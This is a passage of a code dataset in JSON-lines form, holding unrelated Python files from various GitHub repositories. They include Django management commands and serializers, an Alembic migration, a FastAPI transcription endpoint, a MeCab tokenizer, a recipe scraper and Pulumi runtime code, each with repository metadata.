'Y':\n lone_page.delete()\n count += 1\n else: \n self.stdout.write(\"Did not Delete\")\n self.stdout.write(\"Deleted %s Pages\" % count)\n return count\n ","repo_name":"furmanczyk5/Django-Enterprise-App","sub_path":"pages/management/commands/remove_pages.py","file_name":"remove_pages.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"4009846377","text":"import img2pdf\nimport os\n\nalllist = os.listdir(\".\")\nphotolist=[]\nfor x in alllist:\n if x.endswith(\".png\") or x.endswith(\".jpg\"):\n photolist.append(x)\n\npdf = img2pdf.convert(photolist)\n\nfile = open(\"assignment.pdf\",\"wb\")\n\nfile.write(pdf)\nfile.close()\n","repo_name":"subodhstha/learning-python-for-automation","sub_path":"day2/assignment/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43025057694","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nDrop Macaroon description limit\n\nRevision ID: eb736cb3236d\nRevises: cc06bd67a61b\nCreate Date: 2023-03-07 21:29:53.314390\n\"\"\"\n\nimport sqlalchemy as sa\n\nfrom alembic import op\n\nrevision = \"eb736cb3236d\"\ndown_revision = \"cc06bd67a61b\"\n\n\ndef upgrade():\n op.alter_column(\n \"macaroons\",\n \"description\",\n existing_type=sa.VARCHAR(length=100),\n type_=sa.String(),\n existing_nullable=False,\n )\n\n\ndef downgrade():\n raise RuntimeError(\"Order No. 227 - Ни шагу назад!\")\n","repo_name":"pypi/warehouse","sub_path":"warehouse/migrations/versions/eb736cb3236d_drop_macaroon_description_limit.py","file_name":"eb736cb3236d_drop_macaroon_description_limit.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"31763431876","text":"import shutil\nfrom fastapi import APIRouter, Depends, UploadFile\nfrom sqlalchemy.orm import Session\nfrom core.config import settings\nfrom sql_app.crud import get_mp3_transcriber_by_id\nfrom sql_app.models import MP3Transcriber, User\n\nfrom sql_app.session import get_db\nfrom mp3_transcriber.utils import get_large_audio_transcription, get_sentiment\nfrom users.api_route import get_current_user_from_token\nfrom fastapi_limiter.depends import RateLimiter\n\nrouter = APIRouter()\n\n\n@router.post(\"/upload-mp3\")\ndef create_upload_file(\n file: UploadFile,\n db: Session = Depends(get_db),\n current_user: User = Depends(get_current_user_from_token),\n limit_second = Depends(RateLimiter(times=1, seconds=1)),\n limit_min = Depends(RateLimiter(times=10, seconds=60))\n):\n mp3_transcriber = MP3Transcriber(content=file)\n mp3_transcriber.name = file.filename\n with open(file.filename, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n mp3_transcriber.plain_text = get_large_audio_transcription(file.filename)\n try:\n mp3_transcriber.sentiment_analysis = get_sentiment(mp3_transcriber.plain_text)\n except:\n pass\n db.add(mp3_transcriber)\n db.commit()\n db.refresh(mp3_transcriber)\n return mp3_transcriber\n\n\n@router.post(\"/count-words\")\ndef count_words(\n id: int,\n word: str,\n db: Session = Depends(get_db),\n current_user: User = Depends(get_current_user_from_token),\n limit_second = Depends(RateLimiter(times=1, seconds=1)),\n limit_min = Depends(RateLimiter(times=10, seconds=60))\n):\n mp3_transcriber = get_mp3_transcriber_by_id(id, db)\n ocurrence = mp3_transcriber.plain_text.lower().count(word.lower())\n return ocurrence\n","repo_name":"emmanuel-santos1/mp3_transcriber","sub_path":"mp3_transcriber/api_route.py","file_name":"api_route.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11589429793","text":"\"\"\"Expose a class for tokenization.\"\"\"\nfrom logging import getLogger\nfrom typing import List\nimport os\nimport MeCab\n\n\nclass MecabTokenizer:\n \"\"\"A Tokenizer that uses MeCab.\"\"\"\n\n logger = getLogger(__name__)\n\n def __init__(self, tagger: MeCab.Tagger):\n \"\"\"Take a client for MeCab.\"\"\"\n self.tagger = tagger\n\n def __call__(self, text: str) -> List[str]:\n \"\"\"Tokenize a text.\"\"\"\n segments = self.tagger.parse(text)\n tokens = [segment.split('\\t')[0]\n for segment in segments.split(os.linesep)][:-2]\n return tokens\n\n def __getstate__(self):\n \"\"\"Exclude :py:attr:`tagger` because it is not picklable.\"\"\"\n return {}\n\n def __setstate__(self, _):\n \"\"\"Revert :py:attr:`tagger`.\n\n Set :py:attr:`tagger` to a new :py:class:`MeCab.Tagger` object.\n \"\"\"\n self.tagger = self._create_tagger()\n self.logger = getLogger(__name__)\n\n @classmethod\n def create(cls):\n \"\"\"Create a :py:class:`MecabTokenizer` object.\"\"\"\n return MecabTokenizer(cls._create_tagger())\n\n @classmethod\n def _create_tagger(\n cls, \n dicdir=os.getenv('MECAB_DICDIR', None),\n userdic=os.getenv('MECAB_USERDIC', None)\n ) -> MeCab.Tagger:\n \"\"\"Create a :py:class:`MeCab.Tagger` object.\"\"\"\n cls.logger.info('mecab system dictionary is %s.', dicdir)\n cls.logger.info('mecab user dictionary is %s.', userdic)\n\n args = ''\n if dicdir:\n args = f'-d {dicdir}'\n if userdic:\n args = f'{args} -u {userdic}' if args else f'-u {userdic}'\n if len(args) == 0:\n return MeCab.Tagger()\n return MeCab.Tagger(args)\n","repo_name":"nryotaro/serial-mecab","sub_path":"serialmecab/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8912895931","text":"from BeautifulSoup import BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nFOOD_TYPES = open('food_types.txt').readlines()\nBASE_URL = 'http://www.maangchi.com/'\nHEADERS = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0'}\n\ndef main():\n\tfetch_recipe_urls()\n\ndef fetch_recipe_urls():\n\tdf = pd.DataFrame(columns=['english_name', 'korean_name' ,'type', 'url'])\n\tfor food_type in FOOD_TYPES:\n\t\tdf = df.append(get_recipe_names_by_food_type(food_type.split('\\n')[0]))\n\t\n\tdf.to_csv('maangchi_foods.csv', sep='\\t', encoding='utf-8')\n\treturn df\n\ndef get_recipe_names_by_food_type(food_type):\t\n\turl = BASE_URL + ('recipes/%s' % food_type)\n\tresponse = requests.get(url, headers=HEADERS)\n\n\tsoup = BeautifulSoup(response.text)\n\trecipes = soup.findAll(id=re.compile('^post-'))\n\trecipe_urls = []\n\trecipe_english_names = []\n\trecipe_korean_names = []\n\tfor i in xrange(len(recipes)):\n\t\trecipe_urls.append(recipes[i].a['href'])\n\t\trecipe_english_names.append(recipes[i].a['title'])\n\t\trecipe_korean_names.append(str(recipes[i].p).split('<br />\\n')[1][:-4])\n\ttypes = [food_type] * len(recipe_urls)\n\treturn pd.DataFrame({'english_name':recipe_english_names, 'korean_name':recipe_korean_names, 'type':types, 'url':recipe_urls})\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"thomasaeyo/Easy-Recipe","sub_path":"maangchi_scraper.py","file_name":"maangchi_scraper.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7740717666","text":"import dictionaries\nfrom termcolor import colored\n\n\nBOARD_WIDTH = 80\nBOARD_HEIGHT = 20\n\nlist_labels = [\"Type\", \"Level of difficulty\"]\n\ngame_player = {'race': ['1', '2', '3'],\n 'Level_of_difficulty': ['1', '2', '3'], }\n\n\ndef user_info(list_labels):\n print(\"\\nYou can choose who you want to be :D \\nYour options: (1)Man, (2) or (3)Adolescent\\n\")\n\n for elem in range(len(list_labels)):\n user_answer = input(str(list_labels[elem])+\" : \")\n if elem == 0:\n if user_answer not in game_player['race']:\n raise Exception(colored(\"It's not acceptable choice. Try again\\n\", \"red\"))\n else:\n if user_answer == '1':\n print(colored(\"You are a Man so you are more powerful than you think\", 'magenta'))\n dictionaries.player['player_power'] = 5\n elif user_answer == '2':\n print(colored(\"You chose ... and you get ... :D!!!It can be useful later\", 'magenta'))\n dictionaries.player['additional_elements'] = ''\n elif user_answer == '3':\n print(colored(\"Hello little boy ;) Because you're still a child, You get a more life_points \", 'magenta'))\n dictionaries.player['player_life'] = 2\n print(\"\\nOptions: (1) Easy, (2) Medium, (3) Hard \\n\")\n elif elem == 1:\n if user_answer not in game_player['Level_of_difficulty']:\n raise Exception(colored(\"You choose only (1)Easy ,(2) Medium or (3)Hard level of difficulty\\n\", \"red\"))\n else:\n if user_answer == '1':\n dictionaries.player['player_life'] = dictionaries.player['player_life'] + 5\n elif user_answer == '2':\n dictionaries.player['player_life'] = dictionaries.player['player_life'] + 3\n elif user_answer == '3':\n dictionaries.player['player_life'] = dictionaries.player['player_life'] + 1\n\n dictionaries.player[list_labels[elem]] = user_answer\n\n\ndef data_to_print(data):\n keys = [\"Type\", \"Level of difficulty\"]\n data_print = {key: dictionaries.player[key] for key in keys}\n for key in data_print:\n if key == \"Type\":\n if data_print[key] == '1':\n data_print[key] = 'Man'\n elif data_print[key] == '2':\n data_print[key] = '...'\n else:\n data_print[key] = 'Adolescent'\n elif key == \"Level of difficulty\":\n if data_print[key] == '1':\n data_print[key] = 'Easy'\n elif data_print[key] == '2':\n data_print[key] = 'Medium'\n else:\n data_print[key] = 'Hard'\n return data_print\n","repo_name":"iuli988/Projects","sub_path":"roguelike-game/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7430716855","text":"import asyncio\nimport os\nfrom typing import Optional, TYPE_CHECKING\nimport grpc\n\nfrom .. import log\nfrom .. import _types\nfrom ..invoke import InvokeOptions\nfrom ..runtime.proto import provider_pb2\nfrom . import rpc\nfrom .rpc_manager import RPC_MANAGER\nfrom .settings import get_monitor, handle_grpc_error\nfrom .sync_await import _sync_await\n\nif TYPE_CHECKING:\n from .. import Inputs\n\n# This setting overrides a hardcoded maximum protobuf size in the python protobuf bindings. This avoids deserialization\n# exceptions on large gRPC payloads, but makes it possible to use enough memory to cause an OOM error instead [1].\n# Note: We hit the default maximum protobuf size in practice when processing Kubernetes CRDs [2]. If this setting ends\n# up causing problems, it should be possible to work around it with more intelligent resource chunking in the k8s\n# provider.\n#\n# [1] https://github.com/protocolbuffers/protobuf/blob/0a59054c30e4f0ba10f10acfc1d7f3814c63e1a7/python/google/protobuf/pyext/message.cc#L2017-L2024\n# [2] https://github.com/pulumi/pulumi-kubernetes/issues/984\n#\n# This setting requires a platform-specific and python version-specific .so file called\n# `_message.cpython-[py-version]-[platform].so`, which is not present in situations when a new python version is\n# released but the corresponding dist wheel has not been. So, we wrap the import in a try/except to avoid breaking all\n# python programs using a new version.\ntry:\n from google.protobuf.pyext._message import SetAllowOversizeProtos # pylint: disable-msg=E0611\n SetAllowOversizeProtos(True)\nexcept ImportError:\n pass\n\n\nclass InvokeResult:\n \"\"\"\n InvokeResult is a helper type that wraps a prompt value in an Awaitable.\n \"\"\"\n def __init__(self, value):\n self.value = value\n\n # pylint: disable=using-constant-test\n def __await__(self):\n # We need __await__ to be an iterator, but we only want it to return one value. As such, we use\n # `if False: yield` to construct this.\n if False:\n yield self.value\n return self.value\n\n __iter__ = __await__\n\n\ndef invoke(tok: str, props: 'Inputs', opts: Optional[InvokeOptions] = None, typ: Optional[type] = None) -> InvokeResult:\n \"\"\"\n invoke dynamically invokes the function, tok, which is offered by a provider plugin. The inputs\n can be a bag of computed values (Ts or Awaitable[T]s), and the result is a Awaitable[Any] that\n resolves when the invoke finishes.\n \"\"\"\n log.debug(f\"Invoking function: tok={tok}\")\n if opts is None:\n opts = InvokeOptions()\n\n if typ and not _types.is_output_type(typ):\n raise TypeError(\"Expected typ to be decorated with @output_type\")\n\n async def do_invoke():\n # If a parent was provided, but no provider was provided, use the parent's provider if one was specified.\n if opts.parent is not None and opts.provider is None:\n opts.provider = opts.parent.get_provider(tok)\n\n # Construct a provider reference from the given provider, if one was provided to us.\n provider_ref = None\n if opts.provider is not None:\n provider_urn = await opts.provider.urn.future()\n provider_id = (await opts.provider.id.future()) or rpc.UNKNOWN\n provider_ref = f\"{provider_urn}::{provider_id}\"\n log.debug(f\"Invoke using provider {provider_ref}\")\n\n monitor = get_monitor()\n inputs = await rpc.serialize_properties(props, {})\n version = opts.version or \"\"\n accept_resources = not (os.getenv(\"PULUMI_DISABLE_RESOURCE_REFERENCES\", \"\").upper() in {\"TRUE\", \"1\"})\n log.debug(f\"Invoking function prepared: tok={tok}\")\n req = provider_pb2.InvokeRequest(\n tok=tok,\n args=inputs,\n provider=provider_ref,\n version=version,\n acceptResources=accept_resources,\n )\n\n def do_invoke():\n try:\n return monitor.Invoke(req)\n except grpc.RpcError as exn:\n handle_grpc_error(exn)\n\n resp = await asyncio.get_event_loop().run_in_executor(None, do_invoke)\n\n log.debug(f\"Invoking function completed successfully: tok={tok}\")\n # If the invoke failed, raise an error.\n if resp.failures:\n raise Exception(f\"invoke of {tok} failed: {resp.failures[0].reason} ({resp.failures[0].property})\")\n\n # Otherwise, return the output properties.\n ret_obj = getattr(resp, 'return')\n if ret_obj:\n deserialized = rpc.deserialize_properties(ret_obj)\n # If typ is not None, call translate_output_properties to instantiate any output types.\n return rpc.translate_output_properties(deserialized, lambda prop: prop, typ) if typ else deserialized\n return {}\n\n async def do_rpc():\n resp, exn = await RPC_MANAGER.do_rpc(\"invoke\", do_invoke)()\n if exn is not None:\n raise exn\n return resp\n\n return InvokeResult(_sync_await(asyncio.ensure_future(do_rpc())))\n","repo_name":"adriell/lambda-autoservico-storagegateway","sub_path":"dependencies/pulumi/runtime/invoke.py","file_name":"invoke.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15567913050","text":"\"\"\"empty message\n\nRevision ID: ac416eea4e1f\nRevises: 529d01a75828\nCreate Date: 2022-02-16 22:02:56.576269\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ac416eea4e1f'\ndown_revision = '529d01a75828'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('phone', sa.String(length=13), nullable=True))\n op.add_column('user', sa.Column('address', sa.String(length=255), nullable=True))\n op.add_column('user', sa.Column('city', sa.String(length=255), nullable=True))\n op.add_column('user', sa.Column('state', sa.String(length=255), nullable=True))\n op.add_column('user', sa.Column('zip_code', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'zip_code')\n op.drop_column('user', 'state')\n op.drop_column('user', 'city')\n op.drop_column('user', 'address')\n op.drop_column('user', 'phone')\n # ### end Alembic commands ###\n","repo_name":"wglahn/CT-Project-Bridge-E-Commerce","sub_path":"migrations/versions/ac416eea4e1f_.py","file_name":"ac416eea4e1f_.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6067879372","text":"while True:\n conjunto = input().split()\n\n m, n = int(conjunto[0]), int(conjunto[1])\n\n maior = max(m, n)\n menor = min(m, n)\n\n if m <= 0 or n <= 0:\n break\n else:\n cont = 0\n for numero in range(menor, maior + 1):\n cont += numero\n print(f\"{numero} \", end=\"\")\n\n print(f\"Sum={cont}\")\n","repo_name":"brenodocarmo/Exercicios-programacao","sub_path":"uri-online/1101.py","file_name":"1101.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"28130261311","text":"import feedparser\nimport os\nimport pinecone\nimport numpy as np\nimport openai\nimport requests\nfrom bs4 import BeautifulSoup\nfrom retrying import retry\n\n@retry(wait_exponential_multiplier=1000, wait_exponential_max=10000)\ndef create_embedding(article):\n # vectorize with OpenAI text-emebdding-ada-002\n embedding = openai.Embedding.create(\n input=article,\n model=\"text-embedding-ada-002\"\n )\n\n return embedding[\"data\"][0][\"embedding\"]\n\n\n# OpenAI API key\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\n# get the Pinecone API key and environment\npinecone_api = os.getenv('PINECONE_API_KEY')\npinecone_env = os.getenv('PINECONE_ENVIRONMENT')\n\npinecone.init(api_key=pinecone_api, environment=pinecone_env)\n\nif \"blog-index\" not in pinecone.list_indexes():\n print(\"Index does not exist. Creating...\")\n pinecone.create_index(\"blog-index\", 1536)\nelse:\n print(\"Index already exists. Deleting...\")\n pinecone.delete_index(\"blog-index\")\n print(\"Creating new index...\")\n pinecone.create_index(\"blog-index\", 1536)\n\n# set index; must exist\nindex = pinecone.Index('blog-index')\n\n# URL of the RSS feed to parse\nurl = 'https://blog.baeke.info/feed/'\n\n# Parse the RSS feed with feedparser\nfeed = feedparser.parse(url)\n\n# get number of entries in feed\nentries = len(feed.entries)\nprint(\"Number of entries: \", entries)\n\npost_texts = []\npinecone_vectors = []\nfor i, entry in enumerate(feed.entries[:50]):\n # report progress\n print(\"Create embedding for entry \", i, \" of \", entries)\n\n r = requests.get(entry.link)\n soup = BeautifulSoup(r.text, 'html.parser')\n article = soup.find('div', {'class': 'entry-content'}).text\n\n # create embedding\n vector = create_embedding(article)\n\n # append tuple to pinecone_vectors list\n pinecone_vectors.append((str(i), vector, {\"url\": entry.link}))\n\n# all vectors can be upserted to pinecode in one go\nupsert_response = index.upsert(vectors=pinecone_vectors)\n\nprint(\"Vector upload complete.\")\n\n\n\n\n","repo_name":"gbaeke/gpt-vectors","sub_path":"console/upload_vectors.py","file_name":"upload_vectors.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"} +{"seq_id":"12525972119","text":"from flask import Flask, render_template, request, jsonify, make_response\nimport json\nimport re\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n \"\"\"Render the input search field\"\"\"\n return render_template('index.html')\n\n\n@app.route('/search')\ndef search():\n \"\"\"Match the input string by user with the addresses in addresses.json file\n and return matching suggestions in the form of a list i.e suggested_addr\"\"\"\n q = request.args.get('q').strip()\n\n with open('static/addresses.json', 'r') as f:\n data = json.loads(f.read())\n suggested_addr = []\n for d in data:\n for keys,vals in d.items():\n if q in vals:\n suggested_addr.append(d)\n break\n\n resp = make_response(jsonify(suggested_addr[:10]))\n resp.headers['Access-Control-Allow-Origin'] = \"*\"\n return resp\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n\n","repo_name":"pawan0410/flask_address_autocomplete_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14356866819","text":"# 《programming for the puzzled》实操\n# 14.数独问题\n\n\nimport copy\n\n\nbacktracks = 0\n\n\n# 递归解数独\ndef solveSudoku(grid, i=0, j=0):\n global backtracks\n i, j = findNextCellToFill(grid)\n if i == -1:\n return True\n for e in range(1, 10):\n if isValid(grid, i, j, e):\n grid[i][j] = e\n if solveSudoku(grid, i, j):\n return True\n backtracks += 1\n grid[i][j] = 0\n return False\n\n\n# 找到下一个格子\ndef findNextCellToFill(grid):\n for x in range(0, 9):\n for y in range(0, 9):\n if grid[x][y] == 0:\n return x, y\n return -1, -1\n \n \n# 判断i,j格子能否放数字e。\ndef isValid(grid, i, j, e):\n # 检查行\n rowOk = all([e != grid[i][x] for x in range(9)])\n if rowOk:\n # 检查列\n columnOk = all([e != grid[x][j] for x in range(9)])\n if columnOk:\n # 检查小方块\n secTopX, secTopY = 3*(i//3), 3*(j//3)\n for x in range(secTopX, secTopX+3):\n for y in range(secTopY, secTopY+3):\n if grid[x][y] == e:\n return False\n return True\n return False\n \n \n# 输出数独\ndef printSudoku(grid):\n numrow = 0\n for row in grid:\n if numrow % 3 == 0 and numrow != 0:\n print(\" \")\n print(row[0:3], \" \", row[3:6], \" \", row[6:9])\n numrow += 1\n \n \nbacktracks2 = 0\n# 递归解数独,使用隐含信息\ndef solveSudokuOpt(grid, i=0, j=0):\n global backtracks2\n i, j = findNextCellToFill(grid)\n if i == -1:\n return True\n for e in range(1, 10):\n if isValid(grid, i, j, e):\n impl = makeImplications(grid, i, j, e)\n if solveSudoku(grid, i, j):\n return True\n backtracks2 += 1\n undoImplications(grid, impl)\n return False\n \n \ndef undoImplications(grid, impl):\n for i in range(len(impl)):\n grid[impl[i][0]][impl[i][1]] = 0\n \n \nsectors = [[0, 3, 0, 3], [3, 6, 0, 3], [6, 9, 0, 3],[0, 3, 3, 6], [3, 6, 3, 6], [6, 9, 3, 6],[0, 3, 6, 9], [3, 6, 6, 9], [6, 9, 6, 9]]\n\n\ndef makeImplications(grid, i, j, e):\n global sections\n grid[i][j] = e\n impl = [(i, j, e)]\n for k in range(len(sectors)):\n sectinfo = []\n vset = {1,2,3,4,5,6,7,8,9}\n for x in range(sectors[k][0], sectors[k][1]):\n for y in range(sectors[k][2], sectors[k][3]):\n if grid[x][y] != 0:\n vset.remove(grid[x][y])\n for x in range(sectors[k][0], sectors[k][1]):\n for y in range(sectors[k][2], sectors[k][3]):\n if grid[x][y] == 0:\n sectinfo.append([x, y, vset.copy()])\n for m in range(len(sectinfo)):\n sin = sectinfo[m]\n rowv = set()\n for y in range(9):\n rowv.add(grid[sin[0]][y])\n left = sin[2].difference(rowv)\n colv = set()\n for x in range(9):\n colv.add(grid[x][sin[1]])\n left = left.difference(colv)\n if len(left) == 1:\n val = left.pop()\n if isValid(grid, sin[0], sin(1), val):\n grid[sin[0]][sin[1]] = val\n impl.append((sin[0], sin[1], val))\n return impl\n\n\nif __name__ == \"__main__\":\n input1 = [[5, 1, 7, 6, 0, 0, 0, 3, 4],\n [2, 8, 9, 0, 0, 4, 0, 0, 0],\n [3, 4, 6, 2, 0, 5, 0, 9, 0],\n [6, 0, 2, 0, 0, 0, 0, 1, 0],\n [0, 3, 8, 0, 0, 6, 0, 4, 7],\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 9, 0, 0, 0, 0, 0, 7, 8],\n [7, 0, 3, 4, 0, 0, 5, 6, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0]]\n input2 = copy.copy(input1)\n solveSudoku(input1)\n printSudoku(input1)\n print(\"尝试次数:\", backtracks)\n solveSudokuOpt(input2)\n printSudoku(input2)\n print(\"尝试次数:\", backtracks2)\n ","repo_name":"zwdnet/MyQuant","sub_path":"44/14/sodu.py","file_name":"sodu.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"3"} +{"seq_id":"27551002166","text":"import hashlib\r\nimport sys\r\n\r\nPY2 = sys.version_info[0] == 2\r\nif PY2:\r\n unicode_type = unicode\r\nelse:\r\n unicode_type = str\r\n\r\n\r\ndef force_bytes(s, encoding=\"utf-8\", errors=\"strict\"):\r\n if isinstance(s, unicode_type):\r\n s = s.encode(encoding, errors)\r\n return s\r\n\r\n\r\nstr1 = \"abcd\"\r\nhashed = hashlib.md5(force_bytes(str1)).hexdigest()\r\nprint(hashed)\r\n","repo_name":"loggar/py","sub_path":"py-modules/six/md5.manual.py","file_name":"md5.manual.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21760594329","text":"\nfrom ..models import *\nfrom rest_framework import serializers\nfrom collections import OrderedDict\nfrom ..Views.V_TransactionNumberfun import SystemBatchCodeGeneration\nfrom .S_GSTHSNCode import * \n\n\nclass Partiesserializer(serializers.ModelSerializer):\n class Meta:\n model = M_Parties\n fields = ['id', 'Name']\n \n''' POST AND PUT Methods Serializers Save/Edit Create/Update '''\nclass O_BatchWiseLiveStockSerializer(serializers.ModelSerializer):\n class Meta:\n model = O_BatchWiseLiveStock\n fields = ['Item','Quantity','Unit','OriginalBaseUnitQuantity','BaseUnitQuantity','Party','CreatedBy','InterBranchInward']\n \nclass O_LiveBatchesSerializer(serializers.ModelSerializer):\n \n O_BatchWiseLiveStockList = O_BatchWiseLiveStockSerializer(many=True)\n class Meta:\n model = O_LiveBatches\n fields = ['MRP','GST','Rate','BatchDate', 'BatchCode','SystemBatchDate','SystemBatchCode','ItemExpiryDate','OriginalBatchBaseUnitQuantity','O_BatchWiseLiveStockList']\n \n\n\nclass TC_InterBranchInwardReferencesSerializer(serializers.ModelSerializer):\n class Meta:\n model = TC_InterBranchInwardReferences\n fields = ['IBChallan'] \n\nclass TC_InterBranchInwardItemsSerializer(serializers.ModelSerializer):\n class Meta:\n model = TC_InterBranchInwardItems\n fields = ['Item', 'Quantity', 'Unit', 'BaseUnitQuantity', 'MRP', 'ReferenceRate', 'Rate', 'BasicAmount', 'TaxType', 'GST', 'GSTAmount',\n 'Amount', 'DiscountType', 'Discount', 'DiscountAmount', 'CGST', 'SGST', 'IGST', 'CGSTPercentage', 'SGSTPercentage', 'IGSTPercentage', 'BatchDate', 'BatchCode','SystemBatchCode','SystemBatchDate']\n\nclass T_InterBranchInwardSerializer(serializers.ModelSerializer):\n\n InterBranchInwardItems = TC_InterBranchInwardItemsSerializer(many=True)\n \n O_LiveBatchesList=O_LiveBatchesSerializer(many=True)\n \n InterBranchInwardReferences = TC_InterBranchInwardReferencesSerializer(many=True) \n class Meta:\n model = T_InterBranchInward\n fields = ['IBInwardDate', 'IBInwardNumber', 'FullIBInwardNumber', 'GrandTotal', 'CreatedBy', 'UpdatedBy', 'Customer', 'Supplier','InterBranchInwardItems','InterBranchInwardReferences', 'O_LiveBatchesList']\n \n def create(self, validated_data):\n \n IBInwardItems_data = validated_data.pop('InterBranchInwardItems')\n O_LiveBatchesLists_data=validated_data.pop('O_LiveBatchesList')\n \n IBInwardReferences_data = validated_data.pop('InterBranchInwardReferences')\n \n IBInwardID = T_InterBranchInward.objects.create(**validated_data)\n \n for IBInwardItem_data in IBInwardItems_data :\n InwardItem=TC_InterBranchInwardItems.objects.create(IBInward=IBInwardID, **IBInwardItem_data)\n \n for O_LiveBatchesList_data in O_LiveBatchesLists_data :\n O_BatchWiseLiveStockLists=O_LiveBatchesList_data.pop('O_BatchWiseLiveStockList')\n BatchID=O_LiveBatches.objects.create(**O_LiveBatchesList_data)\n for O_BatchWiseLiveStockList in O_BatchWiseLiveStockLists:\n O_BatchWiseLiveStockdata=O_BatchWiseLiveStock.objects.create(InterBranchInward=IBInwardID,LiveBatche=BatchID,**O_BatchWiseLiveStockList) \n \n \n for IBInwardReference_data in IBInwardReferences_data:\n IBInwardReferences=TC_InterBranchInwardReferences.objects.create(IBInward=IBInwardID, **IBInwardReference_data)\n \n \n return IBInwardID\n \n\n\n'''Single Record Details Fetch Get Methods Serializer '''\n\n\nclass Partiesserializer(serializers.ModelSerializer):\n class Meta:\n model = M_Parties\n fields = ['id', 'Name']\n\nclass TC_IBInwardReferencesSerializer(serializers.ModelSerializer):\n class Meta:\n model = TC_InterBranchInwardReferences\n fields = ['IBChallan'] \n \nclass ItemSerializer(serializers.ModelSerializer):\n class Meta : \n model = M_Items\n fields = ['id','Name']\n\nclass Unitserializer(serializers.ModelSerializer):\n class Meta:\n model = M_Units\n fields = ['Name']\n\nclass UnitSerializerSecond(serializers.ModelSerializer):\n UnitID= serializers.SlugRelatedField(read_only=True,slug_field='Name')\n class Meta:\n model = MC_ItemUnits\n fields = ['id','UnitID'] \n\nclass TC_InterBranchInwardItemsSerializerSecond(serializers.ModelSerializer):\n \n Item=ItemSerializer(read_only=True)\n Unit=UnitSerializerSecond(read_only=True)\n GST = M_GstHsnCodeSerializer(read_only=True)\n class Meta:\n model = TC_InterBranchInwardItems\n fields = ['Item', 'Quantity', 'Unit', 'BaseUnitQuantity', 'MRP', 'ReferenceRate', 'Rate', 'BasicAmount', 'TaxType', 'GST', 'GSTAmount',\n 'Amount', 'DiscountType', 'Discount', 'DiscountAmount', 'CGST', 'SGST', 'IGST', 'CGSTPercentage', 'SGSTPercentage', 'IGSTPercentage', 'BatchDate', 'BatchCode','SystemBatchCode','SystemBatchDate'] \n\n\nclass T_InterBranchInwardSerializerForGET(serializers.ModelSerializer):\n Customer = Partiesserializer(read_only=True)\n Supplier = Partiesserializer(read_only=True)\n class Meta:\n model = T_InterBranchInward\n fields = ['id', 'IBInwardDate', 'IBInwardNumber', 'FullIBInwardNumber', 'GrandTotal', 'CreatedBy', 'CreatedOn', 'UpdatedBy', 'Customer', 'Supplier']\n\nclass LiveBatchSerializer(serializers.ModelSerializer):\n class Meta:\n model=O_LiveBatches\n fields='__all__'\n\nclass IBChallanItemsSerializer(serializers.ModelSerializer):\n LiveBatch=LiveBatchSerializer(read_only=True)\n Item=ItemSerializer(read_only=True)\n Unit=UnitSerializerSecond(read_only=True)\n class Meta:\n model = TC_InterbranchChallanItems\n fields = '__all__' \n\nclass IBChallanSerializer(serializers.ModelSerializer):\n 